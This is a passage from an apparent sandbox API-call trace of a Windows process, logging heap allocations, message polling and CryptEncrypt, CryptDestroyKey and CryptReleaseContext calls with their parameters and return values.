wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.615] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.615] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0191.615] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.616] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xc3db, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xc3e0) returned 1 [0191.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.617] CharLowerBuffW (in: lpsz="byte[50145]", cchLength=0xb | out: lpsz="byte[50145]") returned 0xb [0191.617] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0191.619] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.620] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xc3db, dwBufLen=0xc3e0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xc3e0) returned 1 [0191.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0191.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.622] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.622] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.622] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.622] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0191.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.622] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.623] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.623] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.623] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0191.623] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.623] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.623] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.623] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.633] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.633] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.633] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0191.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.634] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.634] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0191.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.634] CryptDestroyKey (hKey=0x90aed8) returned 1 [0191.634] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.634] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.634] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0191.635] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.635] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0191.635] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0191.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0191.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.635] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.639] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0191.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.639] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0191.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.639] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0191.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.639] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.639] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.639] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.640] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.640] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.640] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.640] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.640] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.640] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0191.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.642] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.642] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0191.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.643] FreeLibrary (hLibModule=0x74f20000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0191.643] PeekMessageW (in: lpMsg=0x87f114, 